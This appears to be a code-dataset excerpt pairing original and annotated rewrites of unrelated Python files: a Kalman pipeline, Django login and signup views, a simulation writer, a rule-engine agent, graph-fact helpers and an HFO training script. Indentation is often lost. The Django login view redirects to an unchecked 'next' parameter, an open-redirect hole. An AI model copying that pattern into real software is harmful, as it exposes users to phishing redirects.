# 输出结果
# print(est_model)
fname1 = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}log.txt"
save_3Darray(fname1, y_coef100)
mean_y = np.mean(y_coef9, 0)
var_y = np.var(y_coef9, 0)
print(mean_y, var_y, sep='\n')
fname1 = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}log100.txt"
save_2Darray(fname1, np.array([mean_y, var_y]).T)
def torch4FROLS_pipeline(data_type, configs, n_trial, id_correct, n_correct):
"""基于 Kalman 滤波器的各个算法的 pipeline
Args:
data_type: 数据类型
configs (dict): 配置字典
n_trial: 试验次数
"""
config = configs[data_type]
y_coef100 = np.zeros((100, 5, 5))
y_coef9 = np.zeros((100, 9))
for trial in range(n_trial):
fname = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}{trial+1}.txt"
term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
terms_set = term_selector.make_terms()
# get data
normalized_signals, Kalman_H, candidate_terms, Kalman_S_No = term_selector.make_selection()
print(f'data_type: {data_type}, trial: ### {trial+1}')
kf = torch4FROLS(normalized_signals, Kalman_H=Kalman_H, n_epoch=config['n_epoch'])
y_coef = kf.estimate_coef()
print(kf.y_error, kf.y_error.shape)
y_coef100[trial] = y_coef
est_model = make_func4K4FROLS(y_coef, candidate_terms, Kalman_S_No, fname=fname)
coef9 = []
Kalman_S_No_order = np.sort(Kalman_S_No)
for row in range(5):
for t in range(n_correct[row]):
idx = np.argwhere(Kalman_S_No_order[row, :] == id_correct[data_type][row][t])
value = y_coef[row, idx]
coef9.append(value[0, 0])
y_coef9[trial] = np.array(coef9)
# 输出结果
# print(est_model)
fname1 = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}log.txt"
save_3Darray(fname1, y_coef100)
mean_y = np.mean(y_coef9, 0)
var_y = np.var(y_coef9, 0)
print(mean_y, var_y, sep='\n')
fname1 = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}log100.txt"
save_2Darray(fname1, np.array([mean_y, var_y]).T) | 0.414425 | 0.399402 |
from django.shortcuts import render
# Create your views here.
def view_signup(request):
    """Register a new user and e-mail them an account-activation link.

    NOTE(review): SignUpForm, get_current_site, render_to_string,
    HttpResponse, EmailMessage, urlsafe_base64_encode, force_bytes and
    account_activation_token are not imported in this module's visible
    import block — confirm the missing imports.
    """
    if request.method == 'POST':
        form = SignUpForm(request.POST)
        if form.is_valid():
            # NOTE(review): the user is saved without deactivation; if
            # e-mail activation is meant to gate login, presumably
            # is_active should be False until the link is clicked — verify.
            user = form.save(commit=False)
            user.save()
            current_site = get_current_site(request)
            mail_subject = 'Activate your Ehelp account.'
            message = render_to_string('application/acc_active_email.html', {
                'user': user,
                'domain': current_site.domain,
                'uid': urlsafe_base64_encode(force_bytes(user.pk)),
                'token': account_activation_token.make_token(user),
            })
            to_email = form.cleaned_data.get('email')
            email = EmailMessage(
                mail_subject, message, to=[to_email]
            )
            email.send()
            return HttpResponse('Please confirm your email address to complete the registration')
    else:
        form = SignUpForm()
    return render(request, 'application/../../templates/accounts/signup.html', {'form': form})
def view_login(request):
    """Log a user in; already-authenticated users are sent straight home.

    On POST, validates Django's AuthenticationForm and honours an optional
    'next' redirect target; on GET (or invalid POST) the login form is
    rendered.
    """
    if request.user.is_authenticated:
        return redirect('/')
    if request.method == 'POST':
        form = AuthenticationForm(data=request.POST)
        if form.is_valid():
            user = form.get_user()
            login(request, user)
            if 'next' in request.POST:
                # NOTE(review): 'next' comes from the client unchecked —
                # consider url_has_allowed_host_and_scheme to avoid an
                # open redirect.
                return redirect(request.POST.get('next'))
            else:
                return redirect('/')
    else:
        # Bug fix: the original assigned the form *class*
        # (form = AuthenticationForm) instead of an instance.
        form = AuthenticationForm()
    return render(request=request, template_name='application/login.html', context={'form': form})
@login_required
def view_logout(request):
    """End the current session and send the user back to the login page."""
    logout(request)
    messages.info(request, "Logged out successfully")
    return redirect('/accounts/login/')
@login_required
def view_privacy(request):
    """Show the privacy page with a password-change form.

    POST submissions are validated and saved; either way the browser is
    sent back to '/privacy/'. GET renders a fresh form.
    """
    if request.method == 'POST':
        form = PasswordChangeForm(data=request.POST, user=request.user)
        if form.is_valid():
            form.save()
        # Valid and invalid submissions both land back on the page.
        return redirect('/privacy/')
    form = PasswordChangeForm(user=request.user)
    return render(
        request=request,
        template_name='application/../../templates/accounts/privacy.html',
        context={'password_change_form': form},
        status=200
    )
@login_required
def view_profile(request):
if request.method == 'POST':
if request.GET['contact']:
form = FormUserContact(request.POST, instance=request.user)
if form.is_valid():
form.save()
else:
form = FormUserProfile(request.POST, request.FILES, instance=request.user)
if form.is_valid():
form.save()
return redirect('application:profile')
form = FormUserProfile(instance=request.user)
form_contact = FormUserContact(instance=request.user)
return render(
request=request,
template_name='application/profile.html',
context={'form': form, 'form_contact': form_contact},
status=200
) | ehelp/accounts/views.py | from django.shortcuts import render
# Create your views here.
def view_signup(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.save()
current_site = get_current_site(request)
mail_subject = 'Activate your Ehelp account.'
message = render_to_string('application/acc_active_email.html', {
'user': user,
'domain': current_site.domain,
'uid': urlsafe_base64_encode(force_bytes(user.pk)),
'token': account_activation_token.make_token(user),
})
to_email = form.cleaned_data.get('email')
email = EmailMessage(
mail_subject, message, to=[to_email]
)
email.send()
return HttpResponse('Please confirm your email address to complete the registration')
else:
form = SignUpForm()
return render(request, 'application/../../templates/accounts/signup.html', {'form': form})
def view_login(request):
if request.user.is_authenticated:
return redirect('/')
if request.method == 'POST':
form = AuthenticationForm(data=request.POST)
if form.is_valid():
user = form.get_user()
login(request, user)
if 'next' in request.POST:
return redirect(request.POST.get('next'))
else:
return redirect('/')
else:
form = AuthenticationForm
return render(request=request, template_name='application/login.html', context={'form': form})
@login_required
def view_logout(request):
logout(request)
messages.info(request, "Logged out successfully")
return redirect('/accounts/login/')
@login_required
def view_privacy(request):
if request.method == 'POST':
password_change_form = PasswordChangeForm(data=request.POST, user=request.user)
if password_change_form.is_valid():
password_change_form.save()
return redirect('/privacy/')
else:
return redirect('/privacy/')
else:
password_change_form = PasswordChangeForm(user=request.user)
context = {
'password_change_form': password_change_form
}
return render(
request=request,
template_name='application/../../templates/accounts/privacy.html',
context=context,
status=200
)
@login_required
def view_profile(request):
if request.method == 'POST':
if request.GET['contact']:
form = FormUserContact(request.POST, instance=request.user)
if form.is_valid():
form.save()
else:
form = FormUserProfile(request.POST, request.FILES, instance=request.user)
if form.is_valid():
form.save()
return redirect('application:profile')
form = FormUserProfile(instance=request.user)
form_contact = FormUserContact(instance=request.user)
return render(
request=request,
template_name='application/profile.html',
context={'form': form, 'form_contact': form_contact},
status=200
) | 0.387459 | 0.078713 |
from simframe.frame.abstractgroup import AbstractGroup
from simframe.frame.field import Field
from simframe.frame.group import Group
from simframe.io.reader import Reader
from simframe.io.writer import Writer
from simframe.utils.color import colorize
from collections import deque
import copy
import numbers
import numpy as np
from types import SimpleNamespace
class namespacewriter(Writer):
    """Class to write ``Frame`` object to namespace"""
    def __init__(self, *args, **kwargs):
        # Dumping is off by default: outputs live only in the in-memory
        # buffer; the paired reader is namespacereader.
        super().__init__(_writeframetonamespace, dumping=False, description="Temporary namespace writer",
                         reader=namespacereader, *args, **kwargs)
        # One SimpleNamespace snapshot per written frame, in write order.
        self._buffer = deque([])
    def __repr__(self):
        """Human-readable summary: data dir, dumping flag, verbosity."""
        ret = self.__str__()+"\n"
        ret += "-" * (len(ret)-1) + "\n"
        ret += "    Data directory : {}\n".format(self.datadir)
        ret += "    Dumping        : {}\n".format(
            colorize(self.dumping, "yellow") if not self.dumping else self.dumping)
        ret += "    Verbosity      : {}".format(self.verbosity)
        return ret
    def _getfilename(self):
        """Filenames are not required for this class."""
        pass
    def write(self, owner, i=0, *args, **kwargs):
        """Writes output to namespace
        Parameters
        ----------
        owner : Frame
            Parent frame object
        i : int
            Output number; only used for the progress message
        forceoverwrite : boolean
            Not used in this class
        filename : string
            Not used in this class"""
        # self._func is _writeframetonamespace (set in __init__).
        self._buffer.append(self._func(owner))
        if self.verbosity > 0:
            num = str(i).zfill(self._zfill)
            msg = "Saving frame {}".format(num)
            print(msg)
        if self.dumping:
            self.writedump(owner)
    def reset(self):
        """This resets the namespace.
        Notes
        -----
        WARNING: This cannot be undone."""
        self._buffer.clear()
class namespacereader(Reader):
    """Class to read namespace outputs"""
    def __init__(self, writer):
        super().__init__(writer)
    def all(self):
        """Functions that reads all output files and combines them into a single ``SimpleNamespace``.
        Returns
        -------
        dataset : SimpleNamespace
            Namespace of data set.
        Notes
        -----
        This function is reading one output files to get the structure of the data and
        calls ``read.sequence()`` for every field in the data structure."""
        # Truthiness check instead of building a throwaway deque([]).
        if not self._writer._buffer:
            raise RuntimeError("Writer buffer is empty.")
        # Read first entry to get the structure
        data0 = self._writer._buffer[0]
        return self._expand(data0)
    def output(self, i):
        """Reading a single output
        Parameters
        ----------
        i : int
            Number of output to be read
        Returns
        -------
        n : SimpleNamespace
            Namespace of desired output"""
        # NOTE(review): negative i is passed through to deque indexing
        # (counts from the end) — confirm that is intended.
        if i >= len(self._writer._buffer):
            raise RuntimeError("Output {} does not exist.".format(i))
        return self._writer._buffer[i]
    def sequence(self, field):
        """Reading the entire sequence of a specific field.
        Parameters
        ----------
        field : string
            String with location of requested field
        Returns
        -------
        seq : array
            Array with requested values
        Notes
        -----
        ``field`` is addressing the values just as in the parent frame object.
        E.g. ``"groupA.groupB.fieldC"`` is addressing ``Frame.groupA.groupB.fieldC``."""
        if not self._writer._buffer:
            raise RuntimeError("Writer buffer is empty.")
        if not isinstance(field, str):
            raise TypeError("<field> has to be string.")
        loc = field.split(".")
        ret = []
        # Iterate the deque directly: indexing a deque is O(n) per access,
        # which made the original index loop quadratic in the buffer size.
        for entry in self._writer._buffer:
            A = np.array(_getvaluefrombuffer(entry, loc))
            if A.shape == (1,):
                ret.append(A[0])
            else:
                ret.append(A)
        return np.array(ret)
def _getvaluefrombuffer(buf, loc):
"""Returns a requested value from buffer.
Function is called recursively.
Parameters
----------
buf : dict
Buffer object
loc : list
List of strings with the requested location within buf
Returns
-------
ret : object
Reqested value in buf at position loc"""
if len(loc) > 1:
return _getvaluefrombuffer(buf.__dict__[loc[0]], loc[1:])
if not hasattr(buf, loc[0]):
raise RuntimeError("Requested <field> does not exist.")
return buf.__dict__[loc[0]]
def _converttonamespace(o):
    """Converts an object into a namespace
    Parameters
    ----------
    o : object
        object
    Returns
    -------
    ns : SimpleNamespace
        Nested namespace with the data in Frame object
    Notes
    -----
    Attributes beginning with underscore _ are being ignored.
    So are fields with Field.save == False."""
    ret = {}
    # These things are written directly into the dictionary.
    direct = (numbers.Number, np.number, tuple,
              list, np.ndarray, str)
    for key, val in o.__dict__.items():
        # Ignore hidden variables
        if key.startswith("_"):
            continue
        # Skip fields that should not be stored
        if isinstance(val, Field) and not val.save:
            continue
        # None has no __dict__, so recursing into it would crash; store it
        # (and other plain values) directly. copy.copy(None) is None.
        if val is None or isinstance(val, direct):
            ret[key] = copy.copy(val)
        else:
            ret[key] = _converttonamespace(val)
    return SimpleNamespace(**ret)
def _writeframetonamespace(frame):
"""Takes a list of dicts and a frame, stitches them together and returns namespace.
Paramters
---------
frame : Frame
Frame object to add
Returns
-------
n : SimpleNamespace
Namespace with data"""
d = _converttonamespace(frame)
return d | simframe/io/writers/namespacewriter.py | from simframe.frame.abstractgroup import AbstractGroup
from simframe.frame.field import Field
from simframe.frame.group import Group
from simframe.io.reader import Reader
from simframe.io.writer import Writer
from simframe.utils.color import colorize
from collections import deque
import copy
import numbers
import numpy as np
from types import SimpleNamespace
class namespacewriter(Writer):
"""Class to write ``Frame`` object to namespace"""
def __init__(self, *args, **kwargs):
super().__init__(_writeframetonamespace, dumping=False, description="Temporary namespace writer",
reader=namespacereader, *args, **kwargs)
self._buffer = deque([])
def __repr__(self):
ret = self.__str__()+"\n"
ret += "-" * (len(ret)-1) + "\n"
ret += " Data directory : {}\n".format(self.datadir)
ret += " Dumping : {}\n".format(
colorize(self.dumping, "yellow") if not self.dumping else self.dumping)
ret += " Verbosity : {}".format(self.verbosity)
return ret
def _getfilename(self):
"""Filenames are not required for this class."""
pass
def write(self, owner, i=0, *args, **kwargs):
"""Writes output to namespace
Parameters
----------
owner : Frame
Parent frame object
i : int
Not used in this class
forceoverwrite : boolean
Not used in this class
filename : string
Not used in this class"""
self._buffer.append(self._func(owner))
if self.verbosity > 0:
num = str(i).zfill(self._zfill)
msg = "Saving frame {}".format(num)
print(msg)
if self.dumping:
self.writedump(owner)
def reset(self):
"""This resets the namespace.
Notes
-----
WARNING: This cannot be undone."""
self._buffer.clear()
class namespacereader(Reader):
"""Class to read namespace outputs"""
def __init__(self, writer):
super().__init__(writer)
def all(self):
"""Functions that reads all output files and combines them into a single ``SimpleNamespace``.
Returns
-------
dataset : SimpleNamespace
Namespace of data set.
Notes
-----
This function is reading one output files to get the structure of the data and
calls ``read.sequence()`` for every field in the data structure."""
if self._writer._buffer == deque([]):
raise RuntimeError("Writer buffer is empty.")
# Read first file to get structure
data0 = self._writer._buffer[0]
return self._expand(data0)
def output(self, i):
"""Reading a single output
Parameters
----------
i : int
Number of output to be read
Returns
-------
n : SimpleNamespace
Namespace of desired output"""
if i >= len(self._writer._buffer):
raise RuntimeError("Output {} does not exist.".format(i))
return self._writer._buffer[i]
def sequence(self, field):
"""Reading the entire sequence of a specific field.
Parameters
----------
field : string
String with location of requested field
Returns
-------
seq : array
Array with requested values
Notes
-----
``field`` is addressing the values just as in the parent frame object.
E.g. ``"groupA.groupB.fieldC"`` is addressing ``Frame.groupA.groupB.fieldC``."""
if self._writer._buffer == deque([]):
raise RuntimeError("Writer buffer is empty.")
if not isinstance(field, str):
raise TypeError("<field> has to be string.")
loc = field.split(".")
N = len(self._writer._buffer)
ret = []
for i in range(N):
A = np.array(_getvaluefrombuffer(self._writer._buffer[i], loc))
if A.shape == (1,):
ret.append(A[0])
else:
ret.append(A)
return np.array(ret)
def _getvaluefrombuffer(buf, loc):
"""Returns a requested value from buffer.
Function is called recursively.
Parameters
----------
buf : dict
Buffer object
loc : list
List of strings with the requested location within buf
Returns
-------
ret : object
Reqested value in buf at position loc"""
if len(loc) > 1:
return _getvaluefrombuffer(buf.__dict__[loc[0]], loc[1:])
if not hasattr(buf, loc[0]):
raise RuntimeError("Requested <field> does not exist.")
return buf.__dict__[loc[0]]
def _converttonamespace(o):
"""Converts an object into a namespace
Parameters
----------
o : object
object
Returns
-------
ns : SimpleNamespace
Nested namespace with the data in Frame object
Notes
-----
Attributes beginning with underscore _ are being ignored.
So are fields with Field.save == False."""
ret = {}
# These things are written directy into the dictionary.
direct = (numbers.Number, np.number, tuple,
list, np.ndarray, str)
for key, val in o.__dict__.items():
# Ignore hidden variables
if key.startswith("_"):
continue
# Skip fields that should not be stored
if isinstance(val, Field) and val.save == False:
continue
if val is not None and isinstance(val, direct):
ret[key] = copy.copy(val)
else:
ret[key] = _converttonamespace(val)
return SimpleNamespace(**ret)
def _writeframetonamespace(frame):
"""Takes a list of dicts and a frame, stitches them together and returns namespace.
Paramters
---------
frame : Frame
Frame object to add
Returns
-------
n : SimpleNamespace
Namespace with data"""
d = _converttonamespace(frame)
return d | 0.810479 | 0.259591 |
from .rule import Antecedent
from ..betha_node import BethaNode
from ..alpha_node import AlphaNode
from ..rete import Rete
from abc import abstractmethod
from .run_agenda_action import RunAgendaAction
from .add_fact_agenda_action import AddFactAgendaAction
from .assert_fact_action import AssertFactAction
from .retract_fact_action import RetractFactAction
from .update_fact_action import UpdateFactAction
from ....kernel.agent.Agent import Agent
class PSAgent(Agent):
def __init__(self, agentID):
self.__rules = []
self.engine = Rete()
self.__templates = []
self.__periodic_action = None
super().__init__(agentID)
def add_template(self, template):
self.__templates.append(template)
def add_rule(self, rule):
self.__rules.append(rule)
@abstractmethod
def def_templates(self):
pass
@abstractmethod
def def_constructs(self):
pass
@abstractmethod
def set_periocic_action(self):
pass
    def build(self):
        """Assemble the RETE network from the registered templates and rules.

        One AlphaNode is created per template; each rule becomes a BethaNode
        holding its consequents/antecedents and wired to the alpha nodes of
        its template-based antecedents.
        """
        for template in self.__templates:
            self.engine.add_alpha_node(AlphaNode(template))
        for rule in self.__rules:
            betha_node = BethaNode()
            betha_node.name = rule.name
            for consequent in rule.get_consequents():
                betha_node.add_consequent(consequent)
            for antecedent in rule.get_antecedents():
                betha_node.add_antecedent(antecedent)
                # Only Antecedent instances are linked to an alpha node.
                if isinstance(antecedent, Antecedent):
                    alpha_node = self.engine.get_alpha_node(antecedent.template)
                    alpha_node.add_beta_node(betha_node)
                    betha_node.add_alpha_node(alpha_node)
    def setUp(self):
        """Register the agent's behaviors/actions, then build and load RETE.

        Invoked by the PBESA Agent framework during construction.
        """
        self.state = {
            'alive': False,
            'time': None
        }
        # Agenda handling behavior.
        self.addBehavior('agenda_process')
        self.bindAction('agenda_process', 'run_agenda', RunAgendaAction())
        self.bindAction('agenda_process', 'add_fact_agenda', AddFactAgendaAction())
        # Fact lifecycle behavior (assert / update / retract).
        self.addBehavior('process')
        self.bindAction('process', 'assert_fact', AssertFactAction())
        self.bindAction('process', 'update_fact', UpdateFactAction())
        self.bindAction('process', 'retract_fact', RetractFactAction())
        # The periodic behavior is optional: only bound when the subclass
        # returns an action from set_periocic_action() (sic).
        self.__periodic_action = self.set_periocic_action()
        if self.__periodic_action:
            self.addBehavior('periodic_process')
            self.bindAction('periodic_process', 'periodic', self.__periodic_action)
        # Build RETE
        self.def_templates()
        self.def_constructs()
        self.build()
        # Load data RETE
        self.engine.load_agenda()
        self.engine.load_work_memory()
def shutdown(self):
pass | pbesa/engine/ps/psagent/psagent.py | from .rule import Antecedent
from ..betha_node import BethaNode
from ..alpha_node import AlphaNode
from ..rete import Rete
from abc import abstractmethod
from .run_agenda_action import RunAgendaAction
from .add_fact_agenda_action import AddFactAgendaAction
from .assert_fact_action import AssertFactAction
from .retract_fact_action import RetractFactAction
from .update_fact_action import UpdateFactAction
from ....kernel.agent.Agent import Agent
class PSAgent(Agent):
    """Production-system agent coupling a BESA Agent with a Rete engine.

    Subclasses declare fact templates (def_templates) and rules
    (def_constructs); build() wires them into the Rete alpha/beta network.
    """

    def __init__(self, agentID):
        # Private registries of rules/templates; engine is the Rete network.
        self.__rules = []
        self.engine = Rete()
        self.__templates = []
        self.__periodic_action = None
        super().__init__(agentID)

    def add_template(self, template):
        # Register a fact template; build() turns each into an AlphaNode.
        self.__templates.append(template)

    def add_rule(self, rule):
        # Register a rule; build() turns each into a BethaNode.
        self.__rules.append(rule)

    @abstractmethod
    def def_templates(self):
        """Subclass hook: declare fact templates (call add_template)."""
        pass

    @abstractmethod
    def def_constructs(self):
        """Subclass hook: declare rules (call add_rule)."""
        pass

    @abstractmethod
    def set_periocic_action(self):
        # NOTE(review): the original 'periocic' spelling is kept — external
        # subclasses override this exact name, so it cannot be renamed here.
        """Subclass hook: return a periodic action, or None for none."""
        pass

    def build(self):
        """Wire the registered templates and rules into the Rete network."""
        for template in self.__templates:
            self.engine.add_alpha_node(AlphaNode(template))
        for rule in self.__rules:
            betha_node = BethaNode()
            betha_node.name = rule.name
            for consequent in rule.get_consequents():
                betha_node.add_consequent(consequent)
            for antecedent in rule.get_antecedents():
                betha_node.add_antecedent(antecedent)
                # Plain Antecedent instances are additionally linked both
                # ways with the alpha node of their template.
                if isinstance(antecedent, Antecedent):
                    alpha_node = self.engine.get_alpha_node(antecedent.template)
                    alpha_node.add_beta_node(betha_node)
                    betha_node.add_alpha_node(alpha_node)

    def setUp(self):
        """Bind behaviors/actions, build the Rete network and load its data."""
        self.state = {
            'alive': False,
            'time': None
        }
        self.addBehavior('agenda_process')
        self.bindAction('agenda_process', 'run_agenda', RunAgendaAction())
        self.bindAction('agenda_process', 'add_fact_agenda', AddFactAgendaAction())
        self.addBehavior('process')
        self.bindAction('process', 'assert_fact', AssertFactAction())
        self.bindAction('process', 'update_fact', UpdateFactAction())
        self.bindAction('process', 'retract_fact', RetractFactAction())
        # Optional periodic behavior, only if the subclass supplies an action.
        self.__periodic_action = self.set_periocic_action()
        if self.__periodic_action:
            self.addBehavior('periodic_process')
            self.bindAction('periodic_process', 'periodic', self.__periodic_action)
        # Build RETE
        self.def_templates()
        self.def_constructs()
        self.build()
        # Load data RETE
        self.engine.load_agenda()
        self.engine.load_work_memory()
def shutdown(self):
pass | 0.433981 | 0.201558 |
from model.knowledgegraph import kg_derive_facts
def load_lg_facts(conn, query):
    """
    loads triple-based facts from a SemMedDB and builds the corresponding idx_pmid
    idx_pmid stores a idx_subject and a idx_object for each pmid from the query result
    the indices store which (subject -> [object1, ..., objectn] and which object -> [sub1, ..., subn]
    @param conn: SemMedDB connection handle
    @param query: the query which retrieves facts from the database (must project pmid, subj and obj)
    @return: the idx_pmid (which stores a idx_subject and idx_object behind each pmid)
    """
    cursor = conn.cursor()
    cursor.execute(query)
    idx_pmid = {}
    for row in cursor.fetchall():
        pmid, subj, obj = str(row[0]), str(row[1]), str(row[2])
        entry = idx_pmid.get(pmid)
        if entry is None:
            # First fact for this pmid: start fresh subject/object indices.
            entry = {"idx_subject": {}, "idx_object": {}}
            idx_pmid[pmid] = entry
        # subject -> set of objects, and the inverse object -> set of subjects
        entry["idx_subject"].setdefault(subj, set()).add(obj)
        entry["idx_object"].setdefault(obj, set()).add(subj)
    return idx_pmid
def merge_2_into_1(res1, res2):
    """
    merges 2 dictionaries together
    the second dictionary is merged in the first one (the second remains unchanged / is copied)
    @param res1: a dictionary in which the second dict will be merged (modified in place)
    @param res2: second dict will remain unchanged
    @return: the first dict (in which the second dict is merged)
    """
    for key, objects in res2.items():
        if key in res1:
            # Key present in both: union the value sets in place.
            res1[key].update(objects)
        else:
            # Copy so later mutations of res1 never touch res2's sets.
            res1[key] = objects.copy()
    return res1
def count_val_size_in_dict(result):
    """
    expects a dict with keys which map to sized collections (lists/sets)
    sums the size of all values in the dict
    @param result: a dict where each key maps to a sized collection
    @return: the summed size of all values
    """
    # The keys are irrelevant to the count, so iterate values() directly
    # instead of the previous items() loop with an unused key variable.
    return sum(len(values) for values in result.values())
def derive_facts_with_context(context, relation1, relation2):
    """
    derives facts like the kg but limited to contexts
    @param context: the context index stores a set of keys as the contexts
    @param relation1: first relation to derive facts (each key maps to a idx_sub and idx_obj)
    @param relation2: second relation to derive facts (each key maps to a idx_sub and idx_obj)
    @return: the resulting relation (also behind a context layer), the number of results
    """
    results_s_merged = {}
    for ctx in context:
        # Only contexts present in both relations can contribute a join.
        if ctx in relation1 and ctx in relation2:
            subj_idx = relation2[ctx]["idx_subject"]
            obj_idx = relation1[ctx]["idx_object"]
            ctx_results, _ = kg_derive_facts(subj_idx, obj_idx)
            results_s_merged = merge_2_into_1(results_s_merged, ctx_results)
    return results_s_merged, count_val_size_in_dict(results_s_merged)
def derive_facts_ddi_function(context, relation1, relation2):
    """
    derives facts for the ddi function experiment (the temporary join table must be kept in between)
    @param context: the context index stores a set of keys as the contexts
    @param relation1: first relation to derive facts (each key maps to a idx_sub and idx_obj)
    @param relation2: second relation to derive facts (each key maps to a idx_sub and idx_obj)
    @return: the resulting relation (also behind a context layer), the number of results
    """
    results_s_merged = {}
    for c in context:
        # context must be included in both relations
        if c not in relation1 or c not in relation2:
            continue
        idx_s = relation2[c]["idx_subject"]
        idx_o = relation1[c]["idx_object"]
        # First join: request the object index (compute_o_idx=True) so the
        # intermediate table can be self-joined below; t1_len is unused.
        _, ddi_f_t1_df_o, t1_len = kg_derive_facts(idx_s, idx_o, compute_o_idx=True)
        # drug is in both cases the object
        ddi_f_res, ddi_f_res_len = kg_derive_facts(ddi_f_t1_df_o, ddi_f_t1_df_o)
        results_s_merged = merge_2_into_1(results_s_merged, ddi_f_res)
return results_s_merged, count_val_size_in_dict(results_s_merged) | model/librarygraph.py | from model.knowledgegraph import kg_derive_facts
def load_lg_facts(conn, query):
    """
    loads triple-based facts from a SemMedDB and builds the corresponding idx_pmid
    idx_pmid stores a idx_subject and a idx_object for each pmid from the query result
    the indices store which (subject -> [object1, ..., objectn] and which object -> [sub1, ..., subn]
    @param conn: SemMedDB connection handle
    @param query: the query which retrieves facts from the database (must project pmid, subj and obj)
    @return: the idx_pmid (which stores a idx_subject and idx_object behind each pmid)
    """
    cursor = conn.cursor()
    cursor.execute(query)
    idx_pmid = {}
    for row in cursor.fetchall():
        pmid, subj, obj = str(row[0]), str(row[1]), str(row[2])
        entry = idx_pmid.get(pmid)
        if entry is None:
            # First fact for this pmid: start fresh subject/object indices.
            entry = {"idx_subject": {}, "idx_object": {}}
            idx_pmid[pmid] = entry
        # subject -> set of objects, and the inverse object -> set of subjects
        entry["idx_subject"].setdefault(subj, set()).add(obj)
        entry["idx_object"].setdefault(obj, set()).add(subj)
    return idx_pmid
def merge_2_into_1(res1, res2):
    """
    merges 2 dictionaries together
    the second dictionary is merged in the first one (the second remains unchanged / is copied)
    @param res1: a dictionary in which the second dict will be merged (modified in place)
    @param res2: second dict will remain unchanged
    @return: the first dict (in which the second dict is merged)
    """
    for key, objects in res2.items():
        if key in res1:
            # Key present in both: union the value sets in place.
            res1[key].update(objects)
        else:
            # Copy so later mutations of res1 never touch res2's sets.
            res1[key] = objects.copy()
    return res1
def count_val_size_in_dict(result):
    """
    expects a dict with keys which map to sized collections (lists/sets)
    sums the size of all values in the dict
    @param result: a dict where each key maps to a sized collection
    @return: the summed size of all values
    """
    # The keys are irrelevant to the count, so iterate values() directly
    # instead of the previous items() loop with an unused key variable.
    return sum(len(values) for values in result.values())
def derive_facts_with_context(context, relation1, relation2):
    """
    derives facts like the kg but limited to contexts
    @param context: the context index stores a set of keys as the contexts
    @param relation1: first relation to derive facts (each key maps to a idx_sub and idx_obj)
    @param relation2: second relation to derive facts (each key maps to a idx_sub and idx_obj)
    @return: the resulting relation (also behind a context layer), the number of results
    """
    results_s_merged = {}
    for ctx in context:
        # Only contexts present in both relations can contribute a join.
        if ctx in relation1 and ctx in relation2:
            subj_idx = relation2[ctx]["idx_subject"]
            obj_idx = relation1[ctx]["idx_object"]
            ctx_results, _ = kg_derive_facts(subj_idx, obj_idx)
            results_s_merged = merge_2_into_1(results_s_merged, ctx_results)
    return results_s_merged, count_val_size_in_dict(results_s_merged)
def derive_facts_ddi_function(context, relation1, relation2):
    """
    derives facts for the ddi function experiment (the temporary join table must be kept in between)
    @param context: the context index stores a set of keys as the contexts
    @param relation1: first relation to derive facts (each key maps to a idx_sub and idx_obj)
    @param relation2: second relation to derive facts (each key maps to a idx_sub and idx_obj)
    @return: the resulting relation (also behind a context layer), the number of results
    """
    results_s_merged = {}
    for c in context:
        # context must be included in both relations
        if c not in relation1 or c not in relation2:
            continue
        idx_s = relation2[c]["idx_subject"]
        idx_o = relation1[c]["idx_object"]
        # First join: request the object index (compute_o_idx=True) so the
        # intermediate table can be self-joined below; t1_len is unused.
        _, ddi_f_t1_df_o, t1_len = kg_derive_facts(idx_s, idx_o, compute_o_idx=True)
        # drug is in both cases the object
        ddi_f_res, ddi_f_res_len = kg_derive_facts(ddi_f_t1_df_o, ddi_f_t1_df_o)
        results_s_merged = merge_2_into_1(results_s_merged, ddi_f_res)
return results_s_merged, count_val_size_in_dict(results_s_merged) | 0.806929 | 0.500244 |
import argparse
import pickle
import random
from copy import copy
from typing import List
import numpy as np
from hfo import GOAL, IN_GAME, CAPTURED_BY_DEFENSE, OUT_OF_TIME, OUT_OF_BOUNDS
import settings
from agents.utils import ServerDownError, get_vertices_around_ball
from agents.plastic_v1.base.hfo_attacking_player import HFOAttackingPlayer
from agents.plastic_v1.deep_agent import DQNAgent, Transition, MINIBATCH_SIZE
from agents.plastic_v1.actions.simplex import Actions
from agents.plastic_v1.features.plastic_features import PlasticFeatures
from agents.plastic_v1.aux import print_transiction
STARTING_POSITIONS = {"TOP LEFT": (-0.5, -0.7), "TOP RIGHT": (0.4, -0.7),
"MID LEFT": (-0.5, 0.0), "MID RIGHT": (0.4, 0.0),
"BOTTOM LEFT": (-0.5, 0.7), "BOTTOM RIGHT": (0.4, 0.7)}
class Player:
    """Offline-training wrapper bundling the HFO game interface, feature
    extractor, action set and DQN agent for one attacking player."""

    def __init__(self, num_opponents: int, num_teammates: int,
                 port: int = 6000):
        # Game Interface:
        self.game_interface = HFOAttackingPlayer(num_opponents=num_opponents,
                                                 num_teammates=num_teammates,
                                                 port=port)
        # Features Interface:
        self.features = PlasticFeatures(num_op=num_opponents,
                                        num_team=num_teammates)
        # Actions Interface:
        self.actions = Actions(num_team=num_teammates, features=self.features,
                               game_interface=self.game_interface)
        # Agent instance (hyper-parameters fixed here; epsilon anneals
        # from 1 down to final_epsilon):
        self.agent = DQNAgent(num_features=self.features.num_features,
                              num_actions=self.actions.get_num_actions(),
                              learning_rate=0.005, discount_factor=0.99,
                              epsilon=1, final_epsilon=0.001,
                              epsilon_decay=0.99997, tau=0.125)
if __name__ == '__main__':
    # Offline training entry point: replays a pickled transition buffer
    # through the DQN agent for 20 passes and saves the resulting model.
    parser = argparse.ArgumentParser()
    parser.add_argument('--num_opponents', type=int, default=0)
    parser.add_argument('--num_teammates', type=int, default=0)
    parser.add_argument('--dir', type=str, default=None)
    # Parse Arguments:
    args = parser.parse_args()
    num_team = args.num_teammates
    num_op = args.num_opponents
    directory = args.dir
    # Start Player:
    player = Player(num_teammates=num_team, num_opponents=num_op)
    with open(f"{directory}/learn_buffer", "rb") as fp:  # Unpickling
        train_data = pickle.load(fp)
    print(f"TRAIN DATA len={len(train_data)} from {directory};\n"
          f"{train_data[0]}")
    losses = []
    for i in range(20):
